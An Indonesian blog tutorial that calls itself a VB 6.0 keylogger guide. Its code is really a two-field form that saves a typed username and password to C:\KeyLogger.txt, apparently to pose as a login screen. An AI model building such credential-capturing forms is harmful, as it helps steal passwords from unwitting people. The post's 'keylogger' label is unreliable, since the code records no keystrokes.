Create KeyLogger Dengan VB 6.0

Tutor:
1. 1 Form
2. 2 Text
3. 1 Comand Button
Struktur Tempat2 Memasangnya



4. Isikan Code Pada Command Button 1
Spoiler Code Command Button 1




Open"C:\"& ("KeyLogger.txt") For Output As #1
Write #1, "username: " & Text1.Text & "," & "password: " & Text2.Text
Close #1
MsgBox "Credit: Your", vbinformation, "Sukses"


5. 5.Setelah itu Anda Klik File Make Project



6. Dan Buka My Computer/LocalDisk C/ Keylogger.txt
7. End

NB: Jangan lupa follow blog saya :)

Post a Comment

Previous Post Next Post

Comments